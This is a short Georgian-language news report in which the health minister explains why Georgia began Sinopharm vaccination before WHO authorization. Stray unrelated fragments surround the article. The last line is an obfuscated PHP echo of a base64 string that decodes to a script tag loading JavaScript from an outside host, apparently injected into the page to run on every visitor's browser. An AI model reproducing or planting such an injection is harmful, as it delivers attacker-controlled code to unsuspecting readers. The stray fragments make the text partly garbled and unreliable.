celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით, საქართველოს მსოფლიო ჯანდაცვის ორგანიზაციისგან აქვს უსაფრთხოების გარანტიები, რაც გახდა მიზეზი იმისა, რომ საქართველო არ დაელოდა ჯანმოს ავტორიზაციას და ისე დაიწყო ჩინური “სინოფარმით” აცრის პროცესი. მინსტრმა ეს განცხადება “მაესტროს” ეთერში გააკეთა. 
 
“ჩვენ არაერთხელ გავაჟღერეთ, რომ ქვეყანაში იქნება ავტორიზებული ვაქცინა. ამ კვირაში კი დავიწყეთ “სინოფარმით” აცრა, ეს ემყარება იმ საფუძვლებს, რომ ჩვენ გვაქვს დეტალური ინფორმაცია მსოფლიო ჯანდაცვის ორგანიზაციისგან, რომელთანაც აქტიურად ვთანამშრომლობთ...გვაქვს ის მოლოდინი, რომ “სინოფარმი” მიიღებს ავტორიზაციას და სწორედ ეს გახდა მიზეზი, რომ ავტორიზაციის გამოცხადებამდე დავიწყეთ ამ ვაქცინით მოსახლეობის აცრა, რადგან გვაქვს გარკვეული უსაფრთხოების გარანტიები მსოფლიო ჯანდაცვის ორგანიზაციისგან”,- განაცხადა მინისტრმა.
 
შეგახსენებთ, რომ საქართველოში ჩინური “სინოფარმით” ვაქცინაცია 4 მაისს დაიწყო. მიიღებს თუ არა ავტორიზაციას ჩინური “სინოფარმი” და “სინოვაკი” მომდევნო დღეებში გახდება ცნობილი. 
 
1066
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");